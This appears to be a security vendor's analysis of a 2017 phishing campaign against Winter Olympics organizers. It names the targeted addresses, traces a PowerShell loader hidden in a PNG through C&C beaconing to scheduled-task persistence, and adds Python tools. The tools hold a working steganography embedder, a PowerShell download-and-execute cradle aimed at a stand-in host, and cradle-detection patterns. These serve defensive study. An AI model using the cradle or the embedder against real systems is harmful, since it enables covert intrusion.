Winter Olympics Organizers Targeted in Latest Spear Phishing Campaign Using PowerShell Malware


During our research, we came across a spear phishing campaign targeting the organizers of the 2018 Winter Olympics. The campaign employs several layers of obfuscation and image steganography to deliver its malicious payload. Some of the recipients we believe were targeted are:
  • yj.kim@pyeongchang2018.com
  • ticketing@pyeongchang2018.com
  • yeongseong.choi@pyeongchang2018.com
  • sanghee.cho@pyeongchang2018.com
  • icehockey@pyeongchang2018.com
The sender address was spoofed to make the email look as if it came from info@nctc.go.kr (South Korea's National Counter-Terrorism Center). Inspecting the headers shows that the message actually originated from a server with IP address 43.249.39.152 (hostname ospf1-apac-sg.stickyadstv.com), located in Singapore. The email was sent on 28th December 2017. Based on open source reporting (https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/), a different version of the campaign was also discovered on 22nd December.


Malicious Document / Technical Analysis

The email carried a Word file attachment named “농식품부, 평창동계올림픽대비축산악취방지대책관련기관회의개최.doc” (SHA256: 41ce9e7c8ec4a5f399247d26087a37ad13b4fc8fc9ee62a1d2211b743b2f403a). The file name translates to “Ministry of Agriculture, Food and Rural Affairs: inter-agency meeting held on livestock odor prevention measures in preparation for the Pyeongchang Winter Olympics”, a lure chosen to make the victim open the document and read its content.


Once opened, the Word file urges the user to click “Enable Content” in order to view the document. Once the user clicks the button, the document runs the following obfuscated macro code:

[Figure: obfuscated macro code from the document (screenshot in the original post)]

The malicious document macro executes the following PowerShell code:

[Figure: PowerShell command launched by the macro (screenshot in the original post)]

When executed, the code downloads a PNG file from hxxps://www.thlsystems.forfirst[.]cz/images/adv_s3.png.

[Figure: the downloaded image adv_s3.png (screenshot in the original post)]

The image is a valid PNG that carries PowerShell code in its pixel data, embedded with Invoke-PSImage (https://github.com/peewpw/Invoke-PSImage), an open source tool released only days earlier, on December 20. By modifying the above loader to dump the decoded payload instead of running it, we recover the following obfuscated PowerShell code:
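To make the steganography concrete, here is an added example in Python; it is not code from the original post and not the Invoke-PSImage tool itself. It reproduces the pixel layout that the tool's published PowerShell extractor reads (by my reading of that one-liner): payload byte n is stored in pixel n, row-major, with the high nibble in the low four bits of the blue channel and the low nibble in the low four bits of the green channel, so byte = (B & 15) * 16 | (G & 15). An analyst can use it to plant a test script in a PNG, to pull a script out of a suspect image, or to run the low-nibble triage check at the end. The cover image, the payload URL (c2.invalid) and the minimal PNG writer/reader are all constructed stand-ins so it runs offline; the writer emits only PNG filter type 0, the reader undoes all five filter types so it can read PNGs written by other tools.

```python
"""Invoke-PSImage-style PNG steganography: hide a script in pixel low nibbles and recover it.

Added example, not code from the original post nor the Invoke-PSImage tool. Layout follows the
tool's published extractor: payload byte n is in pixel n (row-major), high nibble in the low 4 bits
of blue, low nibble in the low 4 bits of green, so byte = (B & 15) * 16 | (G & 15). Cover image,
payload and the minimal PNG codec are constructed stand-ins (assumptions) so this runs offline.
"""
import struct
import zlib


def _chunk(tag, data):
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF  # CRC covers the tag and the data, not the length
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)


def write_png(width, height, rows):
    """rows: one bytearray of width*3 RGB bytes per scanline; every row is written with filter 0."""
    raw = b"".join(b"\x00" + bytes(r) for r in rows)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit RGB, not interlaced
    return b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data):
    """Return (width, height, rows) for an 8-bit non-interlaced RGB PNG, reversing filter types 0-4."""
    assert data[:8] == b"\x89PNG\r\n\x1a\n", "not a PNG"
    pos, idat, width, height = 8, b"", 0, 0
    while pos < len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype, _, _, interlace = struct.unpack(">IIBBBBB", body)
            assert (depth, ctype, interlace) == (8, 2, 0), "only 8-bit non-interlaced RGB handled"
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length  # length + tag + body + CRC
    raw, stride = zlib.decompress(idat), width * 3
    rows, prev = [], bytearray(stride)
    for y in range(height):
        start = y * (stride + 1)
        ftype, line = raw[start], bytearray(raw[start + 1:start + 1 + stride])
        for i in range(stride):
            a = line[i - 3] if i >= 3 else 0  # same channel, pixel to the left (already reconstructed)
            b = prev[i]                       # pixel above
            c = prev[i - 3] if i >= 3 else 0  # pixel above-left
            if ftype == 4:  # Paeth predictor
                p = a + b - c
                pa, pb, pc = abs(p - a), abs(p - b), abs(p - c)
                pred = a if pa <= pb and pa <= pc else (b if pb <= pc else c)
            else:
                pred = (0, a, b, (a + b) // 2)[ftype]  # filters None, Sub, Up, Average
            line[i] = (line[i] + pred) & 0xFF
        rows.append(line)
        prev = line
    return width, height, rows


def embed(payload, rows, width):
    """Copy rows and write payload byte n into the blue/green low nibbles of pixel n."""
    out = [bytearray(r) for r in rows]
    assert len(payload) <= width * len(out), "cover image too small for payload"
    for n, byte in enumerate(payload):
        y, x = divmod(n, width)
        g, b = x * 3 + 1, x * 3 + 2
        out[y][g] = (out[y][g] & 0xF0) | (byte & 0x0F)  # green carries the low nibble
        out[y][b] = (out[y][b] & 0xF0) | (byte >> 4)    # blue carries the high nibble
    return out


def extract(rows, width, length):
    """Mirror of the published extractor: byte = (B & 15) * 16 | (G & 15), pixel by pixel."""
    out = bytearray()
    for n in range(length):
        y, x = divmod(n, width)
        out.append(((rows[y][x * 3 + 2] & 0x0F) << 4) | (rows[y][x * 3 + 1] & 0x0F))
    return bytes(out)


def printable_low_nibbles(rows, width, sample=64):
    """Triage heuristic: a photo's low nibbles look random, an embedded script decodes to ASCII text."""
    data = extract(rows, width, min(sample, width * len(rows)))
    return bool(data) and all(32 <= c < 127 or c in (9, 10, 13) for c in data)


# Constructed stand-ins (assumptions): a synthetic cover image and a generic download cradle.
WIDTH, HEIGHT = 64, 8
PAYLOAD = b"IEX((New-Object Net.WebClient).DownloadString('http://c2.invalid/views/login/process.php'))"


def cover_rows(width=WIDTH, height=HEIGHT):
    """Deterministic pseudo-photo so the run needs no image file on disk."""
    return [bytearray((x * 7 + y * 3 + c * 11) & 0xFF for x in range(width) for c in range(3))
            for y in range(height)]


def round_trip(payload=PAYLOAD):
    """Embed, write a real PNG, read it back and extract; returns the recovered payload."""
    png = write_png(WIDTH, HEIGHT, embed(payload, cover_rows(), WIDTH))
    width, _, rows = read_png(png)
    return extract(rows, width, len(payload))
```

printable_low_nibbles() is a coarse check, not a signature: in a real photograph the low nibbles of the colour channels are close to noise, whereas a PSImage payload decodes to readable ASCII from pixel zero onwards, so a hit is a reason to pull the image and run the full extractor. A sample using a different channel mapping, a pixel offset or a compressed payload would slip past it. For a real PNG, the pixel rows obtained from any image library (Pillow's getpixel, for instance) can be fed to the same extract() function.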

[Figure: obfuscated PowerShell code recovered from the image (screenshot in the original post)]

The recovered script then beacons to the C&C server at hxxps://www.thlsystems.forfirst[.]cz/components/com_tags/views/login/process.php and evaluates the received response directly with PowerShell, so the operator can push arbitrary code to the host. The script also downloads implants from hxxps://www.thlsystems.forfirst[.]cz/components/com_tags/views/access_log and hxxp://200.122.181[.]63/os. These two scripts are persisted as daily scheduled tasks named WindowsMediaServiceCore and WindowsMediaServiceCoreInit, running at 3 PM and 11 AM respectively.
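The scheduled-task persistence above is something a responder can hunt for directly. The following Python script is an added example, not code from the original post: Windows keeps one XML definition per task under C:\Windows\System32\Tasks, and the script parses such definitions and flags a task when its name matches the two names reported here or when its action launches PowerShell with a download-and-execute cradle; the reported 11:00 and 15:00 run times are only recorded as supporting evidence, because the time alone would flag plenty of legitimate tasks. The three task definitions are constructed (the real tasks' command lines are not given in the post, so the malicious arguments and the c2.invalid URL are assumptions) so the script runs without touching a live system; scan_directory() is the entry point for a real Tasks folder.

```python
"""Hunt scheduled-task persistence like the WindowsMediaServiceCore / WindowsMediaServiceCoreInit tasks.

Added example, not code from the original post. Parses Windows Task Scheduler XML (one file per task
under C:\\Windows\\System32\\Tasks) and flags tasks by IOC name or by a PowerShell download cradle in
the action arguments. The sample definitions below are constructed; the malicious command line is an
assumption, since the post does not quote the real one.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
IOC_TASK_NAMES = {"WindowsMediaServiceCore", "WindowsMediaServiceCoreInit"}
IOC_TIMES = {"11:00:00", "15:00:00"}  # daily run times reported for the two tasks
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Invoke-Expression|\bIEX\b"
    r"|FromBase64String|-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden", re.I)


def parse_task(xml_data):
    """Pull name, action and daily trigger times out of a Task Scheduler XML document (str or bytes)."""
    root = ET.fromstring(xml_data)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    times = {el.text[11:19] for el in root.iterfind("t:Triggers/t:CalendarTrigger/t:StartBoundary", NS)
             if el.text and len(el.text) >= 19}  # StartBoundary looks like 2017-12-28T15:00:00
    return {
        "name": uri.rsplit("\\", 1)[-1],
        "command": root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS),
        "arguments": root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=NS),
        "daily_at": times,
    }


def triage(task):
    """Return the reasons a task looks like this campaign's persistence; an empty list means clean."""
    reasons = []
    if task["name"] in IOC_TASK_NAMES:
        reasons.append("task name matches campaign IOC")
    if "powershell" in task["command"].lower() and CRADLE.search(task["arguments"]):
        reasons.append("PowerShell download/execute cradle in task arguments")
    if reasons and task["daily_at"] & IOC_TIMES:
        reasons.append("daily trigger time matches reported schedule")  # supporting evidence only
    return reasons


def scan(tasks):
    """tasks: {label: xml}; returns {label: reasons} for every task, flagged or not."""
    return {label: triage(parse_task(xml)) for label, xml in tasks.items()}


def scan_directory(tasks_dir):
    """Walk a real Tasks folder; the files are UTF-16 with an XML declaration, so hand ET the raw bytes."""
    return scan({str(p): p.read_bytes() for p in Path(tasks_dir).rglob("*") if p.is_file()})


_TASK_NS = 'xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"'
SAMPLE_TASKS = {  # constructed definitions in the shape of real Task Scheduler XML
    "media_core": f"""<Task version="1.2" {_TASK_NS}>
  <RegistrationInfo><URI>\\WindowsMediaServiceCore</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2017-12-28T15:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-w hidden -ep bypass -c "IEX((New-Object Net.WebClient).DownloadString('http://c2.invalid/access_log'))"</Arguments>
  </Exec></Actions>
</Task>""",
    "defrag": f"""<Task version="1.2" {_TASK_NS}>
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2017-12-28T11:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>""",
    "admin_script": f"""<Task version="1.2" {_TASK_NS}>
  <RegistrationInfo><URI>\\Backups\\NightlyExport</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2017-12-28T23:30:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command><Arguments>-ExecutionPolicy RemoteSigned -File C:\\Scripts\\export.ps1</Arguments></Exec></Actions>
</Task>""",
}
```

The "defrag" sample runs at 11:00 and the "admin_script" sample launches PowerShell, and neither is flagged: the time is only reported alongside a stronger indicator, and a local script run without a download cradle is ordinary administration. Attackers rename tasks freely, so the cradle regex carries the detection once the campaign-specific names are gone; extend it with whatever your telemetry shows, and pair it with command-line logging (Security 4698 task-creation events carry the same XML).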


While investigating the IP address 200.122.181[.]63 from one of the implants, we found that it resolved to the domain mafra.go.kr.jeojang.ga. The domain jeojang.ga was registered through Freenom, a provider of free domains that permits anonymous registration. Looking closely at the subdomain labels, the name was chosen to resemble the website of South Korea's Ministry of Agriculture, Food and Rural Affairs (MAFRA), mafra.go.kr; the registrable domain is actually jeojang.ga, and the malicious domain is not linked to the ministry's domain in any way.
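The lookalike trick above (a trusted name placed in the left-hand labels of a hostname whose registrable domain is something else entirely) is easy to catch mechanically once you separate the labels from the registrable domain. The following Python check is an added example, not code from the original post; it finds the registrable domain with a hard-coded subset of the Public Suffix List (an assumption standing in for the full list, which production code should load), treats hyphens as label separators as well, so mafra-go-kr.jeojang.ga is caught too, and leaves genuine subdomains such as www.mafra.go.kr alone.

```python
"""Flag hostnames that impersonate a trusted domain, as mafra.go.kr.jeojang.ga impersonates mafra.go.kr.

Added example, not from the original post. PUBLIC_SUFFIXES is a small hand-picked subset of the
Public Suffix List (an assumption); load the real list for production use.
"""
import re

PUBLIC_SUFFIXES = {"com", "net", "org", "kr", "go.kr", "co.kr", "or.kr", "ga", "cz", "tk", "ml"}


def registrable_domain(host):
    """Longest known public suffix plus one label; falls back to the last two labels."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return ".".join(labels[-2:])


def impersonates(host, trusted):
    """True if trusted's labels occur in host (dots or hyphens as separators) but host registers elsewhere."""
    if registrable_domain(host) == registrable_domain(trusted):
        return False  # a genuine subdomain of the trusted zone, e.g. www.mafra.go.kr
    want = trusted.lower().split(".")
    have = re.split(r"[.-]", host.lower().rstrip("."))
    return any(have[i:i + len(want)] == want for i in range(len(have) - len(want) + 1))


def triage_hosts(hosts, trusted):
    """Return the hosts from an IOC list or passive-DNS dump that impersonate trusted."""
    return [h for h in hosts if impersonates(h, trusted)]


# Hostnames from this post plus one constructed hyphenated variant, for a quick run.
SAMPLE_HOSTS = ["mafra.go.kr.jeojang.ga", "mafra-go-kr.jeojang.ga", "www.mafra.go.kr",
                "thlsystems.forfirst.cz", "ospf1-apac-sg.stickyadstv.com"]
```

Run triage_hosts(SAMPLE_HOSTS, "mafra.go.kr") and only the two jeojang.ga names come back. The same function applied to a day's passive-DNS resolutions, with the list of brands your organisation cares about, gives a cheap first pass at this class of lure; it deliberately says nothing about typo-squats (mafra.go.kr with a swapped letter), which need a different distance-based check.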

Conclusion:

The interesting thing to note is the attackers' use of the recently released Invoke-PSImage open source tool, published on December 20. This spear phishing email was sent on 28th December, which shows that the attackers tested and deployed the tool just over a week after its release. Previous examples of attackers misusing open source security tools include the Empire framework, Mimikatz, BeEF and the Nishang post-exploitation framework.

With the Winter Olympics approaching, we expect the actors to keep targeting people with Olympics-themed spam.

Indicators of Compromise:

  • 200.122.181.63 (implant download host; resolves to mafra.go.kr.jeojang.ga)
  • 43.249.39.152 (mail server that sent the spoofed email, Singapore)
  • ospf1-apac-sg.stickyadstv.com (hostname of the sending mail server)
  • 41ce9e7c8ec4a5f399247d26087a37ad13b4fc8fc9ee62a1d2211b743b2f403a (SHA256 of the malicious .doc attachment)
  • thlsystems.forfirst.cz (hosts the PNG payload, the C&C endpoint and an implant)
  • mafra.go.kr.jeojang.ga (lookalike domain impersonating mafra.go.kr)
